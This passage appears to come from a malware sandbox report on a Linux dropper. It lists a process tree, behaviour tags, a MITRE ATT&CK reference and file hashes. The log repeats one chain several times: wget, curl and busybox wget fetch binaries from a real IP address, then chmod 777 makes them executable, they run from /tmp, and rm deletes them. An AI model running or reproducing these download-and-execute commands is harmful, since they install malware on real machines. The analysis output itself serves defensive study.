/bin/busybox/bin/busybox wget http://87.120.126.196/bins/c9uXiBz6Dqg1m8aVFB7dkX3LwklsocXzzD2⤵PID:1644
-
-
/bin/chmodchmod 777 c9uXiBz6Dqg1m8aVFB7dkX3LwklsocXzzD2⤵
- File and Directory Permissions Modification
PID:1645
-
-
/tmp/c9uXiBz6Dqg1m8aVFB7dkX3LwklsocXzzD./c9uXiBz6Dqg1m8aVFB7dkX3LwklsocXzzD2⤵
- Executes dropped EXE
PID:1646
-
-
/bin/rmrm c9uXiBz6Dqg1m8aVFB7dkX3LwklsocXzzD2⤵PID:1647
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr2⤵PID:1648
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr2⤵
- Writes file to tmp directory
PID:1649
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr2⤵PID:1650
-
-
/bin/chmodchmod 777 LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr2⤵
- File and Directory Permissions Modification
PID:1651
-
-
/tmp/LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr./LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr2⤵
- Executes dropped EXE
PID:1652
-
-
/bin/rmrm LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr2⤵PID:1653
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG2⤵PID:1654
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG2⤵
- Writes file to tmp directory
PID:1655
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG2⤵PID:1656
-
-
/bin/chmodchmod 777 TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG2⤵
- File and Directory Permissions Modification
PID:1657
-
-
/tmp/TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG./TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG2⤵
- Executes dropped EXE
PID:1658
-
-
/bin/rmrm TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG2⤵PID:1659
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ2⤵PID:1660
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ2⤵
- Writes file to tmp directory
PID:1661
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ2⤵PID:1662
-
-
/bin/chmodchmod 777 FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ2⤵
- File and Directory Permissions Modification
PID:1663
-
-
/tmp/FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ./FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ2⤵
- Executes dropped EXE
PID:1664
-
-
/bin/rmrm FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ2⤵PID:1665
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/J5ae25TX7zIwwVH3IgEvX3BEMMPfsjINbH2⤵PID:1666
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/J5ae25TX7zIwwVH3IgEvX3BEMMPfsjINbH2⤵
- Writes file to tmp directory
PID:1667
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/J5ae25TX7zIwwVH3IgEvX3BEMMPfsjINbH2⤵PID:1668
-
-
/bin/chmodchmod 777 J5ae25TX7zIwwVH3IgEvX3BEMMPfsjINbH2⤵
- File and Directory Permissions Modification
PID:1669
-
-
/tmp/J5ae25TX7zIwwVH3IgEvX3BEMMPfsjINbH./J5ae25TX7zIwwVH3IgEvX3BEMMPfsjINbH2⤵
- Executes dropped EXE
PID:1670
-
-
/bin/rmrm J5ae25TX7zIwwVH3IgEvX3BEMMPfsjINbH2⤵PID:1671
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/xu9bFgmp5KgGLmZBEsnOJuxWHQvTXBem2R2⤵PID:1672
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/xu9bFgmp5KgGLmZBEsnOJuxWHQvTXBem2R2⤵
- Writes file to tmp directory
PID:1673
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/xu9bFgmp5KgGLmZBEsnOJuxWHQvTXBem2R2⤵PID:1674
-
-
/bin/chmodchmod 777 xu9bFgmp5KgGLmZBEsnOJuxWHQvTXBem2R2⤵
- File and Directory Permissions Modification
PID:1675
-
-
/tmp/xu9bFgmp5KgGLmZBEsnOJuxWHQvTXBem2R./xu9bFgmp5KgGLmZBEsnOJuxWHQvTXBem2R2⤵
- Executes dropped EXE
PID:1676
-
-
/bin/rmrm xu9bFgmp5KgGLmZBEsnOJuxWHQvTXBem2R2⤵PID:1677
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97